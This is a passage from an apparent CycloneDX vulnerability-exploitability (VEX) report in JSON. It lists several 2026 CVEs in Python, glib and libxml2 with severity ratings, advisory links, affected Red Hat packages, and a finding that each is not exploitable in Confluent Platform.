          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0672",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0672"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0672"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/62700107418eb2cca3fc88da036a243ea975f172"
        },
        {
          "url": "https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440"
        },
        {
          "url": "https://github.com/python/cpython/commit/7852d72b653fea0199acf5fc2a84f6f8b84eba8d"
        },
        {
          "url": "https://github.com/python/cpython/commit/918387e4912d12ffc166c8f2a38df92b6ec756ca"
        },
        {
          "url": "https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1869ff648bbee0717221d09e6deff46617f3e85"
        },
        {
          "url": "https://github.com/python/cpython/issues/143919"
        },
        {
          "url": "https://github.com/python/cpython/pull/143920"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0672.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0672"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
        }
      ],
      "published": "2026-01-20T22:15:52+00:00",
      "updated": "2026-06-17T10:11:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0988",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0988"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0988"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429886"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0988"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7971-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0988"
        }
      ],
      "published": "2026-01-21T12:15:55+00:00",
      "updated": "2026-06-17T10:11:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0989",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0989"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429933"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/998"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0989"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:20:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0990",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
